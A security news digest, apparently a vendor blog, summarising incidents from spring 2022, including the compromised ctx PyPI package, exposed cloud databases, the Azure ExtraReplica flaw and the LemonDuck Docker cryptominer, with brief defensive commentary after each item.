May 24, 2022
PyPI package 'ctx' has been compromised by malicious actors to steal environment variables. The package, which typically gets over 22,000 downloads a week, had its code altered to collect environment variables and send them to a C2 after base64 encoding them. In addition to the PyPI package, a fork of PHP library 'phpass' was also altered similarly to retrieve AWS developer secrets and send them to the same C2 address as the ctx package.
Data Security Perspective: For users of ctx, older versions of the package do not contain the malicious code. However, for newer versions 0.2.2, 0.2.6, and above, users should exercise caution and can check for malicious code. For users of phpass, the package appears to have been remedied to stop the attack.
May 11, 2022
Researchers from SafetyDetectives have uncovered a misconfigured AWS S3 bucket belonging to a Pennsylvania breast cancer charity, Breastcancer.org. The bucket, which was left unsecured, contained over 150,000 files or 150GB of data. The data included user avatars, and images users have posted, including private images that include nudity for medical purposes. In addition, the EXIF data was still intact in the images which includes GPS location and device details. The exposed bucket was discovered in November 2021, and has been secured as of May 2022.
Data Security Perspective: Cloud misconfigurations pose a massive risk to organizations and can have severe consequences. Organizations should ensure security policies are followed in order to prevent data exposure. Solutions such as Open Raven or Magpie can discover and alert about exposed data, along with other security policy violations.
April 28, 2022
Researchers at Wiz have discovered a vulnerability in the Microsoft Azure Database for PostgreSQL Flexible Server. The vulnerability, named "#ExtraReplica" bypasses tenant isolation enabling unauthorized read access to other PostgreSQL databases. Malicious actors could gain unauthorized access to other databases by exploiting a bug in the Flexible Server auth process that allows elevated privileges and then use an improperly anchored regex to gain access to the other database.
Data Security Perspective: Microsoft responded to the vulnerability with patches for the Flexible Server released in February 2022 and said that no customers had been affected. As noted by Wiz, this vulnerability highlights the lack of a cloud vulnerability database, similar to the CVE database, which enables users to track and respond to vulnerabilities.
May 5, 2022
After last month's security alert from Github that threat actors were stealing OAuth tokens from Heroku, and Travis-CI, Heroku announced the same stolen token was used to breach their customer database. The company announced the threat actor accessed and exfiltrated customer passwords from a customer database. Heroku initially reported that the stolen OAuth tokens could only provide threat actors to Github repositories but not to Heroku customer accounts.
April 21, 2022
Cryptomining botnet LemonDuck, has been targeting Docker to mine cryptocurrency on Linux. Exposed Docker APIs are targeted with a custom entry point downloading a disguised Bash script. The bash file then sets up a cronjob which downloads the payload and enables it to kill processes, daemons, and known network connections as well as remove other cryptominers. The payload downloads and runs XMRig cryptominer.
Data Security Perspective: The misuse of exposed Docker APIs is increasing, especially for cryptomining. Users should ensure they have the correct security configurations when using Docker.
April 28, 2022
Medical software company Dedalus Biology has been fined 1.5 million Euros after exposing the PII of nearly 500,000 patients. The data, which came from a leaked database, included full names, genetic information, medical information such as medical conditions, and social security numbers. The leak appears to go back to March 2020, with parts of the dataset sold online in 2021. In total, Dedalus Biology was charged with three violations of GDPR, totaling 1.5 million Euros.
Data Security Perspective: Compliance is important for companies, especially those operating in Europe, as data exposure can lead to massive fines. Correct authentication and encryption are necessary for organizations, especially when handling sensitive data.
An exposed database belonging to FOX has been discovered by security researchers from Website Planet. The database contained 58 GB of information, with nearly 13,000,000 records, including internal emails, employee ID numbers, IP addresses, host information, and cast and crew names, among other details. While it is not apparent how long the database was exposed, it has since been secured.
Data Security Perspective: Having the correct configurations for databases and cloud resources is vital for organizations. This story highlights how even large corporations with security teams can be vulnerable to data exposure.
Anchore Engine is an open-source tool that analyzes container images with user-customizable policies. In addition, Anchore also evaluates vulnerabilities in the container images. Anchor Engine can be used within multiple orchestration platforms such as Docker, Kubernetes, Amazon ECS, among others.